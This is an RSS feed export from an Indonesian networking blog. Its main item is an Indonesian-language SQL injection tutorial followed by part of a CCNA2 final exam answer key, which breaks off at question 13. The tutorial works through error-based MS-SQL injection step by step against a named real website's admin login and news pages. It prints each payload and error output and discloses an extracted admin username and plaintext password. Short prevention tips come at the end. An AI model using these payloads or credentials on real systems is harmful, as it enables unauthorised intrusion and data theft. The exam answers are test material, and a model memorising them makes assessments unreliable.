<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>~Art and SkilL~</title><link>http://vanzuearticles.blogspot.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/ArtandSkill" /><description>Networking, CCNA Exploration ,CCNA Exam, CCNA Module, Tutorial Photography ,Photography tools-download</description><language>en</language><managingEditor>noreply@blogger.com (ai' joe vanzue)</managingEditor><lastBuildDate>Thu, 08 Dec 2011 00:42:30 PST</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">70</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="artandskill" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:thumbnail url="http://www.no-bases.org/assets/images/RSS_LOGO_2.gif" /><itunes:owner><itunes:email>vanzue@gmail.com</itunes:email></itunes:owner><itunes:explicit>no</itunes:explicit><itunes:image href="http://www.no-bases.org/assets/images/RSS_LOGO_2.gif" /><itunes:subtitle>Networking, CCNA Exploration ,CCNA Exam, CCNA Module, Tutorial Photography ,Photography tools-download</itunes:subtitle><item><title>SQL Injection</title><link>http://vanzuearticles.blogspot.com/2010/04/sql-injection-step-by-step-by-d-and.html</link><category>Belajar JARKOM</category><author>vanzue@gmail.com</author><pubDate>Tue, 04 Jan 2011 10:49:52 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-4903792338664632542</guid><description>&lt;span class="fullpost"&gt;&lt;strong&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;SQL Injection, step by step&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
By D-and&lt;br /&gt;
Published: April 25, 2007&lt;br /&gt;
&lt;br /&gt;
/*********************************************************&lt;br /&gt;
&amp;nbsp;* SQL Injection, step by step.&lt;br /&gt;
&amp;nbsp;*&lt;br /&gt;
&amp;nbsp;* No Warranty. This tutorial is for educational use only,&lt;br /&gt;
&amp;nbsp;* commercial use is prohibited.&lt;br /&gt;
&amp;nbsp;*&lt;br /&gt;
&amp;nbsp;**********************************************************/&lt;br /&gt;
&lt;br /&gt;
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?&lt;br /&gt;
Anda tahu betapa berbahaya bug yang satu ini ?&lt;br /&gt;
Berikut akan kita sajikan step by step SQL Injection ini.&lt;br /&gt;
Catatan : kita akan membatasi bahasan pada SQL Injection&lt;br /&gt;
di MS-SQL Server.&lt;br /&gt;
&lt;br /&gt;
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id&lt;br /&gt;
Ada dua kelemahan di site ini, yaitu:&lt;br /&gt;
1. Tabel News&lt;br /&gt;
2. Tabel Admin&lt;br /&gt;
&lt;br /&gt;
Langkah pertama, kita tentukan lubang mana yang bisa di-inject&lt;br /&gt;
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.&lt;br /&gt;
Kita akan menemukan 2 model cara input parameter, yaitu dengan&lt;br /&gt;
cara memasukkan lewat input box dan memasukkannya lewat&lt;br /&gt;
alamat URL.&lt;br /&gt;
&lt;br /&gt;
Kita ambil yang termudah dulu, dengan cara input box.&lt;br /&gt;
Kemudian kita cari kotak login yang untuk admin.&lt;br /&gt;
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp&lt;br /&gt;
Langkah pertama untuk menentukan nama tabel dan fieldnya,&lt;br /&gt;
kita inject kotak NIP dengan perintah (password terserah, cabang&lt;br /&gt;
biarkan aja):&lt;br /&gt;
' having 1=1--&lt;br /&gt;
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda&lt;br /&gt;
minus dobel (penting).&lt;br /&gt;
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection&lt;br /&gt;
di www.neoteker.or.id ini (lihat arsip sebelumnya).&lt;br /&gt;
Kemudian akan keluar pesan error:&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Column&lt;br /&gt;
'T_ADMIN.NOMOR' is invalid in the select list because&lt;br /&gt;
it is not contained in an aggregate function and&lt;br /&gt;
there is no GROUP BY clause.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
Keluarlah nama field pertama kita !!!&lt;br /&gt;
Catat nama tabel : T_ADMIN&lt;br /&gt;
Catat nama field : NOMOR&lt;br /&gt;
&lt;br /&gt;
Kemudian kita akan mencari nama field-field berikutnya,&lt;br /&gt;
beserta nama tabel yang mungkin berbeda-beda.&lt;br /&gt;
Kita inject di kotak NIP (password terserah):&lt;br /&gt;
' group by T_ADMIN.NOMOR having 1=1--&lt;br /&gt;
Akan keluar pesan error:&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Column&lt;br /&gt;
'T_ADMIN.NIP' is invalid in the select list because&lt;br /&gt;
it is not contained in either an aggregate&lt;br /&gt;
function or the GROUP BY clause.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
Artinya itulah nama tabel dan field kedua kita.&lt;br /&gt;
Catat : T_ADMIN.NIP&lt;br /&gt;
&lt;br /&gt;
Kemudian kita cari field ke tiga :&lt;br /&gt;
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--&lt;br /&gt;
Akan keluar pesan error:&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Column&lt;br /&gt;
'T_ADMIN.PASSWORD' is invalid in the select list because&lt;br /&gt;
it is not contained in either an aggregate&lt;br /&gt;
function or the GROUP BY clause.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
Catat field ke tiga : T_ADMIN.PASSWORD&lt;br /&gt;
&lt;br /&gt;
Lakukan langkah di atas sampai kita menemukan field terakhir.&lt;br /&gt;
&lt;br /&gt;
Berikut adalah pesan error yang terjadi, jika kita mengecek&lt;br /&gt;
field terakhir dengan meng-inject:&lt;br /&gt;
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,&lt;br /&gt;
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL&lt;br /&gt;
having 1=1--&lt;br /&gt;
(catatan : kalimat harus 1 baris, tidak dipotong)&lt;br /&gt;
--------------------&lt;br /&gt;
- NIP atau Password atau Unit Anda salah !!&amp;nbsp;&amp;nbsp; -&lt;br /&gt;
--------------------&lt;br /&gt;
Sukses !!! Kita berhasil menemukan field terakhir.&lt;br /&gt;
Daftar kolom (field):&lt;br /&gt;
T_ADMIN.NOMOR&lt;br /&gt;
T_ADMIN.NIP&lt;br /&gt;
T_ADMIN.PASSWORD&lt;br /&gt;
T_ADMIN.NAMA&lt;br /&gt;
T_ADMIN.KD_RANTING&lt;br /&gt;
T_ADMIN.ADDRESS&lt;br /&gt;
T_ADMIN.EMAIL&lt;br /&gt;
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),&lt;br /&gt;
ini akan mempermudah proses kita selanjutnya.&lt;br /&gt;
&lt;br /&gt;
Langkah berikutnya, kita menentukan jenis struktur field-&lt;br /&gt;
field tersebut di atas.&lt;br /&gt;
&lt;br /&gt;
Kita inject di kotak NIP (pass terserah) :&lt;br /&gt;
' union select sum(NOMOR) from T_ADMIN--&lt;br /&gt;
Arti dari query tersebut adalah : kita coba menerapkan&lt;br /&gt;
klausa sum sebelum menentukan apakah jumlah kolom-kolom&lt;br /&gt;
di dua rowsets adalah sejenis.&lt;br /&gt;
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)&lt;br /&gt;
yang berlaku untuk type kolom numerik, jadi untuk type kolom&lt;br /&gt;
yang bukan numerik, akan keluar error yang bisa memberitahu&lt;br /&gt;
kita jenis kolom yang dimaksud.&lt;br /&gt;
Pesan error :&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries&lt;br /&gt;
in an SQL statement containing a UNION operator must have&lt;br /&gt;
an equal number of expressions in their target lists.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
artinya kolom NOMOR berjenis numerik.&lt;br /&gt;
&lt;br /&gt;
Berikutnya kita inject :&lt;br /&gt;
' union select sum(NIP) from T_ADMIN--&lt;br /&gt;
Akan keluar pesan error :&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum&lt;br /&gt;
or average aggregate operation cannot take a char data&lt;br /&gt;
type as an argument.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
Artinya kolom NIP bertype char.&lt;br /&gt;
&lt;br /&gt;
Kita harus mengulang perintah di atas untuk kolom yang&lt;br /&gt;
berikutnya dengan jalan mengganti nama_kolom di :&lt;br /&gt;
' union select sum(nama_kolom) from T_ADMIN--&lt;br /&gt;
dengan kolom yang berikutnya.&lt;br /&gt;
Kita peroleh 7 type kolom:&lt;br /&gt;
T_ADMIN.NOMOR =&amp;gt; numeric&lt;br /&gt;
T_ADMIN.NIP =&amp;gt; char&lt;br /&gt;
T_ADMIN.PASSWORD =&amp;gt; nvarchar&lt;br /&gt;
T_ADMIN.NAMA =&amp;gt; char&lt;br /&gt;
T_ADMIN.KD_RANTING =&amp;gt; char&lt;br /&gt;
T_ADMIN.ADDRESS =&amp;gt; nvarchar&lt;br /&gt;
T_ADMIN.EMAIL =&amp;gt; char&lt;br /&gt;
&lt;br /&gt;
Langkah berikutnya, kita akan mencari isi kolom password,&lt;br /&gt;
untuk user admin, dengan meng-inject :&lt;br /&gt;
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA &amp;gt; 'a'--&lt;br /&gt;
artinya kita memilih minimum nama user yang lebih besar dari 'a'&lt;br /&gt;
dan mencoba meng-konvert-nya ke tipe integer.&lt;br /&gt;
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih&lt;br /&gt;
kolom NAMA, dan mengabaikan 6 kolom yang lain.&lt;br /&gt;
Akan keluar pesan error :&lt;br /&gt;
--------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax&lt;br /&gt;
error converting the varchar value 'bill ' to&lt;br /&gt;
a column of data type int.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
--------------------&lt;br /&gt;
Anda lihat :&lt;br /&gt;
varchar value 'bill '&lt;br /&gt;
'bill' itu adalah nama user di record yang terakhir dimasukkan,&lt;br /&gt;
atau isi kolom NAMA di record yang terakhir dimasukkan.&lt;br /&gt;
&lt;br /&gt;
Selanjutnya kita inject :&lt;br /&gt;
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where&lt;br /&gt;
NAMA = 'bill'--&lt;br /&gt;
catatan : harus sebaris (tidak dipotong).&lt;br /&gt;
Akan keluar error :&lt;br /&gt;
---------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax&lt;br /&gt;
error converting the nvarchar value 'm@mpusk@u' to a&lt;br /&gt;
column of data type int.&lt;br /&gt;
/sipm/admin/dologin.asp, line 7&lt;br /&gt;
---------------------&lt;br /&gt;
Artinya kita berhasil !!!&lt;br /&gt;
Kita dapatkan&lt;br /&gt;
[+] NAMA = bill&lt;br /&gt;
[+] PASSWORD = m@mpusk@u&lt;br /&gt;
&lt;br /&gt;
Silahkan login ke :&lt;br /&gt;
www.pln-wilkaltim.co.id/sipm/admin/admin.asp&lt;br /&gt;
dengan account di atas, sedang nama cabang, silahkan anda&lt;br /&gt;
isi sendiri dengan cara coba-coba&lt;br /&gt;
&lt;br /&gt;
Atau kita pakai jalan pintas saja....&lt;br /&gt;
&lt;br /&gt;
Kita inject-kan :&lt;br /&gt;
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN&lt;br /&gt;
where NAMA ='bill'--&lt;br /&gt;
catatan : harus satu baris.&lt;br /&gt;
Duarrrrrr..........&lt;br /&gt;
Glhodhak.............&lt;br /&gt;
Langsung masuk ke menu admin.&lt;br /&gt;
Ingat : jangan buat kerusakan ! beritahu sang admin !!!&lt;br /&gt;
&lt;br /&gt;
Lubang ke dua adalah pada bagian berita.&lt;br /&gt;
Pada dasarnya berita di situ adalah isi dari tabel yang&lt;br /&gt;
lain lagi. Jadi tetep bisa kita inject !!!&lt;br /&gt;
Bedanya, kita harus memasukkan parameter di alamat URL-nya.&lt;br /&gt;
Contoh :&lt;br /&gt;
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&amp;amp;idm=40&amp;amp;idSM=2&lt;br /&gt;
ada parameter id dan idSM.&lt;br /&gt;
Setelah kita coba inject, ternyata yang berpengaruh adalah&lt;br /&gt;
parameter id aja (CMIIW).&lt;br /&gt;
&lt;br /&gt;
Kita inject-kan :&lt;br /&gt;
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--&lt;br /&gt;
akan keluar pesan error :&lt;br /&gt;
---------------------------&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)&lt;br /&gt;
[Microsoft][ODBC SQL Server Driver][SQL Server]Column&lt;br /&gt;
'tb_news.NewsId' is invalid in the select list because&lt;br /&gt;
it is not contained in an aggregate function and&lt;br /&gt;
there is no GROUP BY clause.&lt;br /&gt;
/dari_Media.asp, line 58&lt;br /&gt;
---------------------------&lt;br /&gt;
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita&lt;br /&gt;
yang pertama.&lt;br /&gt;
&lt;br /&gt;
Ulangi langkah-langkah kita di atas sampai didapatkan :&lt;br /&gt;
tb_news.NewsId =&amp;gt; numeric&lt;br /&gt;
tb_news.NewsCatId =&amp;gt; numeric&lt;br /&gt;
tb_news.EntryDate =&amp;gt; datetime&lt;br /&gt;
tb_news.Title =&amp;gt; nvarchar&lt;br /&gt;
tb_news.Content =&amp;gt;&lt;br /&gt;
tb_news.FotoLink =&amp;gt;&lt;br /&gt;
tb_news.FotoType =&amp;gt; bit data&lt;br /&gt;
tb_news.review =&amp;gt;&lt;br /&gt;
tb_news.sumber =&amp;gt; char&lt;br /&gt;
tb_news.dateagenda =&amp;gt; datetime&lt;br /&gt;
&lt;br /&gt;
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan&lt;br /&gt;
pengetahuan anda.&lt;br /&gt;
Anda bisa men-insert berita yang bisa anda tentukan sendiri&lt;br /&gt;
isinya.&lt;br /&gt;
&lt;br /&gt;
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.&lt;br /&gt;
&lt;br /&gt;
Perkiraan saya, nama-nama partai di situs KPU yang di-hack&lt;br /&gt;
oleh Shizoprenic, juga ada di tabel-tabel suatu database,&lt;br /&gt;
jadi tetep bisa dimasuki dengan cara SQL Injection ini.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
******************************************************&lt;br /&gt;
KHUSUS BUAT ADMIN &amp;amp; WEB PROGRAMMER !!!&lt;br /&gt;
******************************************************&lt;br /&gt;
Cara pencegahan yang umum digunakan :&lt;br /&gt;
1. Batasi panjang input box (jika memungkinkan), dengan&lt;br /&gt;
cara membatasinya di kode program, jadi si cracker pemula&lt;br /&gt;
akan bingung sejenak melihat input box nya gak bisa di&lt;br /&gt;
inject dengan perintah yang panjang.&lt;br /&gt;
2. Filter input yang dimasukkan oleh user, terutama penggunaan&lt;br /&gt;
tanda kutip tunggal (Input Validation).&lt;br /&gt;
3. Matikan atau sembunyikan pesan-pesan error yang keluar&lt;br /&gt;
dari SQL Server yang berjalan.&lt;br /&gt;
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,&lt;br /&gt;
Extended Stored Procedures jika memungkinkan.&lt;br /&gt;
5. Ubah "Startup and run SQL Server" menggunakan low privilege user&lt;br /&gt;
di SQL Server Security tab.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Yah itulah mungkin yang dapat saya ceritakan.....&lt;br /&gt;
Hal itu adalah gambaran, betapa tidak amannya dunia internet...&lt;br /&gt;
Kalau mau lebih aman, copot kabel jaringan anda, copot disk&lt;br /&gt;
drive anda, copot harddisk anda, jual kompie anda !!!&lt;br /&gt;
Just kidding )&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Referensi :&lt;br /&gt;
[+] sqlinjection, www.BlackAngels.it&lt;br /&gt;
[+] anvanced sql injection in sql server applications&lt;br /&gt;
(www.ngssoftware.com)&lt;br /&gt;
[+] sql injection walktrough (www.securiteam.com) &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-4903792338664632542?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-05T01:49:52.333+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Final Exam CCNA2 14 maret 2010</title><link>http://vanzuearticles.blogspot.com/2010/04/final-exam-ccna2-14-maret-2010.html</link><category>CCNA 2 Take Assessment</category><category>Final Exam CCNA2</category><author>vanzue@gmail.com</author><pubDate>Sun, 25 Apr 2010 22:00:49 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-8850629412901436522</guid><description>&lt;span class="Apple-style-span" style="color: #202020; font-family: Arial, Tahoma, Verdana; font-size: 12px;"&gt;&lt;div style="line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. What are two functions of a router? (Choose two.)&amp;nbsp;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;It connects multiple IP networks.&lt;/b&gt;&lt;/div&gt;It controls the flow of data via the use of Layer 2 addresses.&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;It determines the best path to send packets.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
It manages the VLAN database.&lt;br /&gt;
It increases the size of the broadcast domain&lt;br /&gt;
&lt;br /&gt;
2. When a router boots, what is the default order to locate the Cisco IOS if there is no boot system command?&lt;br /&gt;
ROM, TFTP server, flash&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;flash, TFTP server, ROM&lt;/b&gt;&lt;/div&gt;flash, NVRAM, TFTP server&lt;br /&gt;
NVRAM, TFTP server, flash&lt;br /&gt;
&lt;br /&gt;
3. Which router component is used to store the routing table?&lt;br /&gt;
Flash&lt;br /&gt;
NVRAM&lt;br /&gt;
ROM&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;SDRAM&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
4&lt;a href="http://www.ccna4u.org/" style="color: #2255aa; text-decoration: none;"&gt;.&lt;/a&gt;&amp;nbsp;Refer to the exhibit. How many routes are child routes?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wUaqtUI8I/AAAAAAAAAEM/D4T_FjnqIFc/s1600-h/4.png" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="163" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wUaqtUI8I/AAAAAAAAAEM/D4T_FjnqIFc/s400/4.png" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
1&lt;br /&gt;
3&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;4&lt;/b&gt;&lt;/div&gt;6&lt;br /&gt;
&lt;br /&gt;
&lt;a href="" name="more" style="color: #2255aa; text-decoration: none;"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5. Refer to the exhibit. Which statement is true concerning the routing configuration?&lt;br /&gt;
Using dynamic routing instead of static routing would have required fewer configuration steps.&lt;br /&gt;
The 10.1.1.0/24 and 10.1.2.0/24 routes have adjacent boundaries and should be summarized.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Packets routed to the R2 Fast Ethernet interface require two routing table lookups.&lt;/b&gt;&lt;/div&gt;The static route will not work correctly&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wVMT9N7aI/AAAAAAAAAEU/3DH7zIoPw7A/s1600-h/6.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;6. Refer to the exhibit. The network administrator issues the command no ip classless on Router1. What forwarding action will take place on a packet that is received by Router1 and is destined for host 192.168.0.26?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wVMT9N7aI/AAAAAAAAAEU/3DH7zIoPw7A/s1600-h/6.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wVMT9N7aI/AAAAAAAAAEU/3DH7zIoPw7A/s400/6.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The packet will be dropped.&lt;/b&gt;&lt;/div&gt;The packet will be forwarded to the gateway of last resort.&lt;br /&gt;
The packet will match the 192.168.0.0 network and be forwarded out Serial 0/0.&lt;br /&gt;
The packet will most closely match the 192.168.0.8 subnet and be forwarded out Serial 0/1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
7. Refer to the exhibit. Routers R1 and R3 use different routing protocols with default administrative distance values. All devices are properly configured and the destination network is advertised by both protocols.&lt;br /&gt;
&lt;br /&gt;
Which path will be used to transmit the data packets between PC1 and PC2?&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The packets will travel via R2-R1.&lt;/b&gt;&lt;/div&gt;The packets will travel via R2-R3.&lt;br /&gt;
The traffic will be load-balanced between two paths — via R2-R1 and via R2-R3.&lt;br /&gt;
The packets will travel via R2-R3, and the other path via R2-R1 will be retained as the backup path&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
8. Refer to the exhibit. Router R1 is configured as shown in the exhibit. PC1 on 172.16.1.0/24 network can reach the default gateway on R1. The rest of the routers are configured with the correct IP addresses on the interfaces. Routers R2 and R3 do not have static or dynamic routing enabled. How far will PC1 be able to successfully ping?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wV9vLhk5I/AAAAAAAAAEY/9hmN-4I-ecA/s1600-h/8.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="263" src="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wV9vLhk5I/AAAAAAAAAEY/9hmN-4I-ecA/s400/8.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
router R1 Fa0/0 interface&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;router R1 S0/0/0 interface&lt;/b&gt;&lt;/div&gt;router R2 S0/0/0 interface&lt;br /&gt;
router R2 Fa0/0 and S0/0/1 interfaces&lt;br /&gt;
router R3 Fa0/0 and S0/0/0 interfaces&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
9. Refer to the exhibit. All routers are properly configured to use the EIGRP routing protocol with default settings, and the network is fully converged. Which statement correctly describes the path that the traffic will use from the 10.1.1.0/24 network to the 10.1.2.0/24 network?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wWP1rprpI/AAAAAAAAAEc/mXLFraMgVgc/s1600-h/9.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="205" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wWP1rprpI/AAAAAAAAAEc/mXLFraMgVgc/s400/9.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
It will use the A-D path only.&lt;br /&gt;
It will use the path A-D, and the paths A-C-D and A-B-D will be retained as the backup paths.&lt;br /&gt;
It will use all the paths equally in a round-robin fashion.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The traffic will be load-balanced between A-B-D and A-C-D.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
10. Which two statements are true regarding link-state routing protocols? (Choose two.)&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;They are aware of the complete network topology.&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;They offer rapid convergence times in large networks.&lt;/b&gt;&lt;/div&gt;They do not include subnet masks in their routing updates.&lt;br /&gt;
They rely on decreasing hop counts to determine the best path.&lt;br /&gt;
They do not work well in networks that require special hierarchical designs.&lt;br /&gt;
They pass their entire routing tables to their directly connected neighbors only&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wWmIZo2pI/AAAAAAAAAEg/lLHqNzDOHeU/s1600-h/11.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;11. Refer to the exhibit. R1 knows two routes, Path A and Path B, to the Ethernet network attached to R3. R1 learned Path A to network 10.2.0.0/16 from a static route and Path B to network 10.2.0.0/16 from EIGRP. Which route will R1 install in its routing table?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wWmIZo2pI/AAAAAAAAAEg/lLHqNzDOHeU/s1600-h/11.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="193" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5wWmIZo2pI/AAAAAAAAAEg/lLHqNzDOHeU/s400/11.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Both routes are installed and load balancing occurs across both paths.&lt;br /&gt;
The route via Path B is installed because the EIGRP route has the best metric to network 10.2.0.0/16.&lt;br /&gt;
The route via Path A is installed because the static route has the best metric to network 10.2.0.0/16.&lt;br /&gt;
The route via Path B is installed because the EIGRP route has the lowest administrative distance to network 10.2.0.0/16.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The route via Path A is installed because the static route has the lowest administrative distance to network 10.2.0.0/16.&lt;/b&gt;&lt;/div&gt;12. What two routing protocols use a hierarchal network topology? (Choose two.)&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;IS-IS&lt;/b&gt;&lt;/div&gt;EIGRP&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;OSPF&lt;/b&gt;&lt;/div&gt;RIPv1&lt;br /&gt;
RIPv2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. Based on the output from the show running-config and debug ip rip commands, what are two of the routes that are added to the routing table of R1? (Choose two.)&lt;br /&gt;
